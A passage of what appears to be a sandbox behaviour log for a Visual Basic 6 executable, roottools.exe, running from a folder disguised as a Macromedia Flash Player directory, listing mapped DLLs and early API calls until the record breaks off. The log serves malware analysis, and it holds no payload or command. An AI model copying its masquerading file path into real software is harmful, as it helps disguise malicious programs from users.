"msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 2798 start_va = 0x75ad0000 end_va = 0x75ad4fff entry_point = 0x75ad0000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 2799 start_va = 0x75f20000 end_va = 0x76014fff entry_point = 0x75f20000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 2800 start_va = 0x76690000 end_va = 0x767c5fff entry_point = 0x76690000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 2801 start_va = 0x75c40000 end_va = 0x75e3afff entry_point = 0x75c40000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 2802 start_va = 0x75690000 end_va = 0x75697fff entry_point = 0x75690000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 2803 start_va = 0xb4a0000 end_va = 0xb5effff entry_point = 0x0 region_type = private name = "private_0x000000000b4a0000" filename = "" Region: id = 2804 start_va = 0x75670000 end_va = 0x75685fff entry_point = 0x75670000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 2805 start_va = 0x3370000 end_va = 0x33abfff entry_point = 0x3370000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2806 start_va = 0x3460000 end_va = 0x349ffff entry_point = 0x0 region_type = private name = "private_0x0000000003460000" filename = "" Region: id = 2807 start_va = 0x3370000 end_va = 0x33abfff entry_point = 0x3370000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2808 start_va = 0x3370000 end_va = 0x33abfff entry_point = 0x3370000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2809 start_va = 0x3370000 end_va = 0x33abfff entry_point = 0x3370000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2810 start_va = 0x3370000 end_va = 0x33abfff entry_point = 0x3370000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2811 start_va = 0x75630000 end_va = 0x7566afff entry_point = 0x75630000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2812 start_va = 0x2d0000 end_va = 0x2d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Thread: id = 203 os_tid = 0x6a8 [0293.667] GetVersion () returned 0x1db10106 [0293.668] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x759c0000 [0293.669] GetProcAddress (hModule=0x759c0000, lpProcName="IsTNT") returned 0x0 [0293.669] VirtualAlloc (lpAddress=0x0, dwSize=0x400000, flAllocationType=0x2000, flProtect=0x4) returned 0x1d40000 [0293.669] VirtualAlloc (lpAddress=0x1d40000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x1d40000 [0293.670] GetCurrentThreadId () returned 0x6a8 [0293.670] GetCommandLineA () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe\" " [0293.670] GetEnvironmentStringsW () returned 0x3149f8* [0293.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1379, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1379 [0293.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1379, lpMultiByteStr=0x1d307d0, cbMultiByte=1379, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=::=::\\", lpUsedDefaultChar=0x0) returned 1379 [0293.670] FreeEnvironmentStringsW (penv=0x3149f8) returned 1 [0293.671] GetStartupInfoA (in: lpStartupInfo=0x18f9b8 | out: lpStartupInfo=0x18f9b8*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0293.671] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0293.671] GetFileType (hFile=0x0) returned 0x0 [0293.671] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0293.671] GetFileType (hFile=0x0) returned 0x0 [0293.671] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0293.671] GetFileType (hFile=0x0) returned 0x0 [0293.671] SetHandleCount (uNumber=0x20) returned 0x20 [0293.671] GetACP () returned 0x4e4 [0293.671] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f9e0 | out: lpCPInfo=0x18f9e0) returned 1 [0293.671] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72a4c528, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe")) returned 0x6e [0293.672] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x759c0000 [0293.672] GetProcAddress (hModule=0x759c0000, lpProcName="IsProcessorFeaturePresent") returned 0x759d5235 [0293.672] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0293.673] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x7c [0293.673] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x80 [0293.673] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0293.673] GetModuleFileNameA (in: hModule=0x72940000, lpFilename=0x72a4e6c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\MSVBVM60.DLL" (normalized: "c:\\windows\\system32\\msvbvm60.dll")) returned 0x20 [0293.673] GetVersion () returned 0x1db10106 [0293.673] lstrcmpiW (lpString1="A", lpString2="B") returned -1 [0293.675] GetUserDefaultLCID () returned 0x409 [0293.675] CompareStringW (Locale=0x409, dwCmpFlags=0x30001, lpString1="A", cchCount1=-1, lpString2="B", cchCount2=-1) returned 1 [0293.675] GetSystemMetrics (nIndex=5) returned 1 [0293.675] GetSystemMetrics (nIndex=6) returned 1 [0293.675] GetSystemMetrics (nIndex=11) returned 32 [0293.675] GetSystemMetrics (nIndex=12) returned 32 [0293.675] GetSystemMetrics (nIndex=34) returned 132 [0293.675] GetSystemMetrics (nIndex=35) returned 38 [0293.675] GetSystemMetrics (nIndex=0) returned 1440 [0293.675] GetSystemMetrics (nIndex=1) returned 900 [0293.675] GetSystemMetrics (nIndex=32) returned 8 [0293.678] GetSystemMetrics (nIndex=33) returned 8 [0293.678] GetSystemMetrics (nIndex=42) returned 0 [0293.679] GetStockObject (i=15) returned 0x188000b [0293.679] GetStockObject (i=7) returned 0x1b00017 [0293.679] GetStockObject (i=6) returned 0x1b00018 [0293.679] GetStockObject (i=8) returned 0x1b00016 [0293.679] GetStockObject (i=4) returned 0x1900011 [0293.679] GetStockObject (i=2) returned 0x1900012 [0293.679] GetStockObject (i=0) returned 0x1900010 [0293.679] GetStockObject (i=5) returned 0x1900015 [0293.679] GetStockObject (i=13) returned 0x18a002e [0293.679] GetDC (hWnd=0x0) returned 0x40101b8 [0293.679] GetTextExtentPointA (in: hdc=0x40101b8, lpString="0", c=1, lpsz=0x18f9dc | out: lpsz=0x18f9dc) returned 1 [0293.690] GetDeviceCaps (hdc=0x40101b8, index=14) returned 1 [0293.690] GetDeviceCaps (hdc=0x40101b8, index=12) returned 32 [0293.690] GetDeviceCaps (hdc=0x40101b8, index=88) returned 96 [0293.690] GetDeviceCaps (hdc=0x40101b8, index=90) returned 96 [0293.690] GetDeviceCaps (hdc=0x40101b8, index=38) returned 32409 [0293.690] ReleaseDC (hWnd=0x0, hDC=0x40101b8) returned 1 [0293.691] CoGetMalloc (in: dwMemContext=0x1, ppMalloc=0x72a4e7d0 | out: ppMalloc=0x72a4e7d0*=0x75c266bc) returned 0x0 [0293.691] GetCurrentThreadId () returned 0x6a8 [0293.691] GetStartupInfoA (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0293.691] GetCurrentThreadId () returned 0x6a8 [0293.691] GetCurrentThreadId () returned 0x6a8 [0293.691] GetCommandLineA () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe\" " [0293.691] lstrlenA (lpString="") returned 0 [0293.691] lstrcpyA (in: lpString1=0x18feac, lpString2="" | out: lpString1="") returned="" [0293.691] SetErrorMode (uMode=0x8001) returned 0x0 [0293.691] GetModuleFileNameA (in: hModule=0x72940000, lpFilename=0x18fb68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\MSVBVM60.DLL" (normalized: "c:\\windows\\system32\\msvbvm60.dll")) returned 0x20 [0293.691] GetUserDefaultLCID () returned 0x409 [0293.691] lstrcpyA (in: lpString1=0x18f868, lpString2="*" | out: lpString1="*") returned="*" [0293.691] LoadStringA (in: hInstance=0x72940000, uID=0x7d1, lpBuffer=0x18fc6c, cchBufferMax=8 | out: lpBuffer="409") returned 0x3 [0293.692] GetSystemDefaultLCID () returned 0x409 [0293.692] GetUserDefaultLCID () returned 0x409 [0293.692] GetLocaleInfoA (in: Locale=0x400, LCType=0xe, lpLCData=0x18fc76, cchData=2 | out: lpLCData=".") returned 2 [0293.692] GetStockObject (i=13) returned 0x18a002e [0293.692] GetObjectA (in: h=0x18a002e, c=60, pv=0x18fc3c | out: pv=0x18fc3c) returned 60 [0293.692] GetLocaleInfoA (in: Locale=0x409, LCType=0x80000003, lpLCData=0x18fc38, cchData=4 | out: lpLCData="ENU") returned 4 [0293.692] lstrcpyA (in: lpString1=0x18fc68, lpString2="EN" | out: lpString1="EN") returned="EN" [0293.692] lstrlenA (lpString="{xx}") returned 4 [0293.692] lstrlenA (lpString="VB98.CHM") returned 8 [0293.692] lstrcpyA (in: lpString1=0x72a4eae8, lpString2="VB98.CHM" | out: lpString1="VB98.CHM") returned="VB98.CHM" [0293.692] GetLocaleInfoA (in: Locale=0x409, LCType=0x80000003, lpLCData=0x18fc38, cchData=4 | out: lpLCData="ENU") returned 4 [0293.692] lstrcpyA (in: lpString1=0x18fc68, lpString2="EN" | out: lpString1="EN") returned="EN" [0293.692] lstrlenA (lpString="{xx}") returned 4 [0293.692] lstrlenA (lpString="VBENLR98.CHM") returned 12 [0293.692] lstrcpyA (in: lpString1=0x72a4ebf0, lpString2="VBENLR98.CHM" | out: lpString1="VBENLR98.CHM") returned="VBENLR98.CHM" [0293.692] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x18fd90, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe")) returned 0x6e [0293.692] GetModuleFileNameA (in: hModule=0x72940000, lpFilename=0x18fc8c, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\MSVBVM60.DLL" (normalized: "c:\\windows\\system32\\msvbvm60.dll")) returned 0x20 [0293.692] lstrcpynA (in: lpString1=0x18fb70, lpString2="C:\\Windows\\system32\\MSVBVM60.DLL", iMaxLength=260 | out: lpString1="C:\\Windows\\system32\\MSVBVM60.DLL") returned="C:\\Windows\\system32\\MSVBVM60.DLL" [0293.692] lstrlenA (lpString="C:\\Windows\\system32\\MSVBVM60.DLL") returned 32 [0293.692] lstrcpyA (in: lpString1=0x4b17b0, lpString2="C:\\Windows\\system32\\MSVBVM60.DLL" | out: lpString1="C:\\Windows\\system32\\MSVBVM60.DLL") returned="C:\\Windows\\system32\\MSVBVM60.DLL" [0293.696] LCMapStringA (in: Locale=0x409, dwMapFlags=0x200, lpSrcStr="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe", cchSrc=-1, lpDestStr=0x18fb50, cchDest=260 | out: lpDestStr="C:\\USERS\\AETADZJZ\\APPDATA\\ROAMING\\MACROMEDIA\\FLASH PLAYER\\MACROMEDIA.COM\\SUPPORT\\FLASHPLAYER\\SYS\\ROOTTOOLS.EXE") returned 111 [0293.698] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x18fc54, dwRevision=0x1 | out: pSecurityDescriptor=0x18fc54) returned 1 [0293.698] SetSecurityDescriptorDacl (in: pSecurityDescriptor=0x18fc54, bDaclPresent=1, pDacl=0x0, bDaclDefaulted=0 | out: pSecurityDescriptor=0x18fc54) returned 1 [0293.698] CreateSemaphoreA (lpSemaphoreAttributes=0x18fc68, lInitialCount=0, lMaximumCount=2147483647, lpName="C:?USERS?AETADZJZ?APPDATA?ROAMING?MACROMEDIA?FLASH PLAYER?MACROMEDIA.COM?SUPPORT?FLASHPLAYER?SYS?ROOTTOOLS.EXE") returned 0x90 [0293.698] GetLastError () returned 0x0 [0293.698] GetVersionExA (in: lpVersionInformation=0x18fbcc*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18fbcc*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0293.698] OleInitialize (pvReserved=0x0) returned 0x0 [0294.891] OaBuildVersion () returned 0x321396 [0294.891] LoadLibraryA (lpLibFileName="OLEAUT32.DLL") returned 0x761b0000 [0294.891] GetLastError () returned 0x0 [0294.891] GetProcAddress (hModule=0x761b0000, lpProcName="OleLoadPictureEx") returned 0x762170a1 [0294.891] RegisterClipboardFormatA (lpszFormat="Link") returned 0xc0de [0294.891] RegisterClipboardFormatA (lpszFormat="Rich Text Format") returned 0xc0ae [0294.891] GetClassInfoA (in: hInstance=0x72940000, lpClassName="VBFocusRT6", lpWndClass=0x18fc34 | out: lpWndClass=0x18fc34) returned 0 [0294.892] RegisterClassA (lpWndClass=0x18fc34) returned 0xc0df [0294.892] GetClassInfoA (in: hInstance=0x72940000, lpClassName="VBBubbleRT6", lpWndClass=0x18fc34 | out: lpWndClass=0x18fc34) returned 0 [0294.892] RegisterClassA (lpWndClass=0x18fc34) returned 0xc0e0 [0294.892] GetUserDefaultLCID () returned 0x409 [0294.892] GetSystemInfo (in: lpSystemInfo=0x18fbf4 | out: lpSystemInfo=0x18fbf4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0294.892] VirtualAlloc (lpAddress=0x0, dwSize=0x10000, flAllocationType=0x2000, flProtect=0x4) returned 0x290000 [0294.892] VirtualAlloc (lpAddress=0x290000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x290000 [0294.892] VirtualAlloc (lpAddress=0x290000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x290000 [0294.892] VirtualAlloc (lpAddress=0x290000, dwSize=0x3000, flAllocationType=0x1000, flProtect=0x4) returned 0x290000 [0294.893] VirtualAlloc (lpAddress=0x290000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x290000 [0294.893] VirtualAlloc (lpAddress=0x290000, dwSize=0x5000, flAllocationType=0x1000, flProtect=0x4) returned 0x290000 [0294.893] VirtualAlloc (lpAddress=0x290000, dwSize=0x6000, flAllocationType=0x1000, flProtect=0x4) returned 0x290000 [0294.893] VirtualProtect (in: lpAddress=0x290000, dwSize=0x6000, flNewProtect=0x20, lpflOldProtect=0x18fc50 | out: lpflOldProtect=0x18fc50*=0x4) returned 1 [0294.893] GetCurrentProcess () returned 0xffffffff [0294.893] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x290000, dwSize=0x6000) returned 1 [0294.893] GlobalAddAtomA (lpString="VBDisabled") returned 0xc01e [0294.893] GetVersion () returned 0x1db10106 [0294.893] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x761b0000 [0294.893] GetProcAddress (hModule=0x761b0000, lpProcName="DispCallFunc") returned 0x761c3dcf [0294.893] GetProcAddress (hModule=0x761b0000, lpProcName="LoadTypeLibEx") returned 0x761c07b7 [0294.893] GetProcAddress (hModule=0x761b0000, lpProcName="UnRegisterTypeLib") returned 0x761e1ca9 [0294.893] GetProcAddress (hModule=0x761b0000, lpProcName="CreateTypeLib2") returned 0x761c8e70 [0294.893] GetProcAddress (hModule=0x761b0000, lpProcName="VarDateFromUdate") returned 0x761c7684 [0294.894] GetProcAddress (hModule=0x761b0000, lpProcName="VarUdateFromDate") returned 0x761ccc98 [0294.894] GetProcAddress (hModule=0x761b0000, lpProcName="GetAltMonthNames") returned 0x761f903a [0294.894] GetProcAddress (hModule=0x761b0000, lpProcName="VarNumFromParseNum") returned 0x761c6231 [0294.894] GetProcAddress (hModule=0x761b0000, lpProcName="VarParseNumFromStr") returned 0x761c5fea [0294.894] GetProcAddress (hModule=0x761b0000, lpProcName="VarDecFromR4") returned 0x761d3f94 [0294.894] GetProcAddress (hModule=0x761b0000, lpProcName="VarDecFromR8") returned 0x761d4e9e [0294.894] GetProcAddress (hModule=0x761b0000, lpProcName="VarDecFromDate") returned 0x761fdb72 [0294.894] GetProcAddress (hModule=0x761b0000, lpProcName="VarDecFromI4") returned 0x761e2a8c [0294.894] GetProcAddress (hModule=0x761b0000, lpProcName="VarDecFromCy") returned 0x761fd737 [0294.894] GetProcAddress (hModule=0x761b0000, lpProcName="VarR4FromDec") returned 0x761fe015 [0294.894] GetProcAddress (hModule=0x761b0000, lpProcName="GetRecordInfoFromTypeInfo") returned 0x761fcc3d [0294.894] GetProcAddress (hModule=0x761b0000, lpProcName="GetRecordInfoFromGuids") returned 0x761fd1c4 [0294.894] GetProcAddress (hModule=0x761b0000, lpProcName="SafeArrayGetRecordInfo") returned 0x761fd48c [0294.894] GetProcAddress (hModule=0x761b0000, lpProcName="SafeArraySetRecordInfo") returned 0x761fd4c6 [0294.894] GetProcAddress (hModule=0x761b0000, lpProcName="SafeArrayGetIID") returned 0x761fd509 [0294.894] GetProcAddress (hModule=0x761b0000, lpProcName="SafeArraySetIID") returned 0x761ce7bb [0294.894] GetProcAddress (hModule=0x761b0000, lpProcName="SafeArrayCopyData") returned 0x761ce496 [0294.894] GetProcAddress (hModule=0x761b0000, lpProcName="SafeArrayAllocDescriptorEx") returned 0x761cddf1 [0294.895] GetProcAddress (hModule=0x761b0000, lpProcName="SafeArrayCreateEx") returned 0x761fd53f [0294.895] GetProcAddress (hModule=0x761b0000, lpProcName="VarFormat") returned 0x76202055 [0294.895] GetProcAddress (hModule=0x761b0000, lpProcName="VarFormatDateTime") returned 0x762020ea [0294.895] GetProcAddress (hModule=0x761b0000, lpProcName="VarFormatNumber") returned 0x76202151 [0294.895] GetProcAddress (hModule=0x761b0000, lpProcName="VarFormatPercent") returned 0x762021f5 [0294.895] GetProcAddress (hModule=0x761b0000, lpProcName="VarFormatCurrency") returned 0x76202288 [0294.895] GetProcAddress (hModule=0x761b0000, lpProcName="VarWeekdayName") returned 0x76202335 [0294.895] GetProcAddress (hModule=0x761b0000, lpProcName="VarMonthName") returned 0x762023d5 [0294.895] GetProcAddress (hModule=0x761b0000, lpProcName="VarAdd") returned 0x761d5934 [0294.895] GetProcAddress (hModule=0x761b0000, lpProcName="VarAnd") returned 0x761d5a98 [0294.895] GetProcAddress (hModule=0x761b0000, lpProcName="VarCat") returned 0x761d59b4 [0294.895] GetProcAddress (hModule=0x761b0000, lpProcName="VarDiv") returned 0x7622e405 [0294.895] GetProcAddress (hModule=0x761b0000, lpProcName="VarEqv") returned 0x7622ef07 [0294.895] GetProcAddress (hModule=0x761b0000, lpProcName="VarIdiv") returned 0x7622f00a [0294.895] GetProcAddress (hModule=0x761b0000, lpProcName="VarImp") returned 0x7622ef47 [0294.895] GetProcAddress (hModule=0x761b0000, lpProcName="VarMod") returned 0x7622f15e [0294.895] GetProcAddress (hModule=0x761b0000, lpProcName="VarMul") returned 0x7622dbd4 [0294.895] GetProcAddress (hModule=0x761b0000, lpProcName="VarOr") returned 0x7622ecfa [0294.896] GetProcAddress (hModule=0x761b0000, lpProcName="VarPow") returned 0x7622ea66 [0294.896] GetProcAddress (hModule=0x761b0000, lpProcName="VarSub") returned 0x7622d332 [0294.896] GetProcAddress (hModule=0x761b0000, lpProcName="VarXor") returned 0x7622ee2e [0294.896] GetProcAddress (hModule=0x761b0000, lpProcName="VarAbs") returned 0x7622ca11 [0294.896] GetProcAddress (hModule=0x761b0000, lpProcName="VarFix") returned 0x7622cc5f [0294.896] GetProcAddress (hModule=0x761b0000, lpProcName="VarInt") returned 0x7622cde7 [0294.896] GetProcAddress (hModule=0x761b0000, lpProcName="VarNeg") returned 0x7622c802 [0294.896] GetProcAddress (hModule=0x761b0000, lpProcName="VarNot") returned 0x7622ec66 [0294.896] GetProcAddress (hModule=0x761b0000, lpProcName="VarRound") returned 0x7622d155 [0294.896] GetProcAddress (hModule=0x761b0000, lpProcName="VarCmp") returned 0x761cb0dc [0294.896] GetProcAddress (hModule=0x761b0000, lpProcName="VarDecAdd") returned 0x761e5f3e [0294.896] GetProcAddress (hModule=0x761b0000, lpProcName="VarDecCmp") returned 0x761d4fd0 [0294.896] GetProcAddress (hModule=0x761b0000, lpProcName="VarBstrCat") returned 0x761d0d2c [0294.896] GetProcAddress (hModule=0x761b0000, lpProcName="VarCyMulI4") returned 0x761e59ed [0294.896] GetProcAddress (hModule=0x761b0000, lpProcName="VarBstrCmp") returned 0x761bf8b8 [0294.896] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x75ae0000 [0294.896] GetProcAddress (hModule=0x75ae0000, lpProcName="CoCreateInstanceEx") returned 0x75b29d4e [0294.896] GetProcAddress (hModule=0x75ae0000, lpProcName="CLSIDFromProgIDEx") returned 0x75af0782 [0294.897] GetSystemMetrics (nIndex=42) returned 0 [0294.897] CoGetMalloc (in: dwMemContext=0x1, ppMalloc=0x72a4e688 | out: ppMalloc=0x72a4e688*=0x75c266bc) returned 0x0 [0294.897] IMalloc:Alloc (This=0x75c266bc, cb=0x4) returned 0x318f68 [0294.897] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18f968, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe")) returned 0x6e [0294.897] lstrcatA (in: lpString1="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe", lpString2=".cfg" | out: lpString1="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe.cfg") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe.cfg" [0294.897] SetLastError (dwErrCode=0x0) [0294.897] SearchPathA (in: lpPath=0x0, lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe.cfg", lpExtension=0x0, nBufferLength=0x103, lpBuffer=0x18f864, lpFilePart=0x18f838 | out: lpBuffer="|ú\x18", lpFilePart=0x18f838) returned 0x0 [0294.898] SetLastError (dwErrCode=0x2) [0294.898] GetLastError () returned 0x2 [0294.898] lstrcmpiA (lpString1="roottools", lpString2="MTX") returned 1 [0294.898] lstrcmpiA (lpString1="roottools", lpString2="DLLHOST") returned 1 [0294.898] lstrcmpiA (lpString1="roottools", lpString2="INETINFO") returned 1 [0294.898] lstrcmpiA (lpString1="roottools", lpString2="W3WP") returned -1 [0294.898] lstrcmpiA (lpString1="roottools", lpString2="ASPNET_WP") returned 1 [0294.898] lstrcmpiA (lpString1="roottools", lpString2="DLLHST3G") returned 1 [0294.898] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18f95c, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe")) returned 0x6e [0294.898] lstrcmpiA (lpString1="roottools", lpString2="IEXPLORE") returned 1 [0294.898] LoadLibraryA (lpLibFileName="SXS.DLL") returned 0x74010000 [0294.905] GetLastError () returned 0x0 [0294.905] GetProcAddress (hModule=0x74010000, lpProcName="SxsOleAut32MapIIDOrCLSIDToTypeLibrary") returned 0x74057685 [0294.905] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18feac, cbMultiByte=-1, lpWideCharStr=0x18fea8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0294.906] CoRegisterMessageFilter (in: lpMessageFilter=0x4b2054, lplpMessageFilter=0x4b205c | out: lplpMessageFilter=0x4b205c*=0x0) returned 0x0 [0294.910] IUnknown:AddRef (This=0x4b2054) returned 0x2 [0294.911] GetClassInfoExA (in: hInstance=0x72940000, lpszClass="ThunderRT6Main", lpwcx=0x18fe78 | out: lpwcx=0x18fe78) returned 0 [0294.911] LoadIconA (hInstance=0x400000, lpIconName=0x1) returned 0x300e5 [0294.911] GetModuleHandleA (lpModuleName="USER32") returned 0x758c0000 [0294.911] GetProcAddress (hModule=0x758c0000, lpProcName="GetSystemMetrics") returned 0x758d7d2f [0294.911] GetProcAddress (hModule=0x758c0000, lpProcName="MonitorFromWindow") returned 0x758e3150 [0294.911] GetProcAddress (hModule=0x758c0000, lpProcName="MonitorFromRect") returned 0x758fe7a0 [0294.912] GetProcAddress (hModule=0x758c0000, lpProcName="MonitorFromPoint") returned 0x758e5281 [0294.912] GetProcAddress (hModule=0x758c0000, lpProcName="EnumDisplayMonitors") returned 0x758e451a [0294.912] GetProcAddress (hModule=0x758c0000, lpProcName="GetMonitorInfoA") returned 0x758e4413 [0294.912] GetSystemMetrics (nIndex=0) returned 1440 [0294.912] GetSystemMetrics (nIndex=78) returned 1440 [0294.912] GetSystemMetrics (nIndex=1) returned 900 [0294.912] GetSystemMetrics (nIndex=79) returned 900 [0294.912] GetSystemMetrics (nIndex=50) returned 16 [0294.912] GetSystemMetrics (nIndex=49) returned 16 [0294.912] LoadImageA (hInst=0x400000, name=0x1, type=0x1, cx=16, cy=16, fuLoad=0x0) returned 0x300e7 [0294.912] RegisterClassExA (param_1=0x18fe78) returned 0x8ec0e2 [0294.912] CreateWindowExA (dwExStyle=0x80, lpClassName="ThunderRT6Main", lpWindowName=0x0, dwStyle=0x80090000, X=-2147483648, Y=-2147483648, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x72940000, lpParam=0x0) returned 0x1010a [0294.916] NtdllDefWindowProc_A (hWnd=0x1010a, Msg=0x81, wParam=0x0, lParam=0x18fa5c) returned 0x1 [0294.917] NtdllDefWindowProc_A (hWnd=0x1010a, 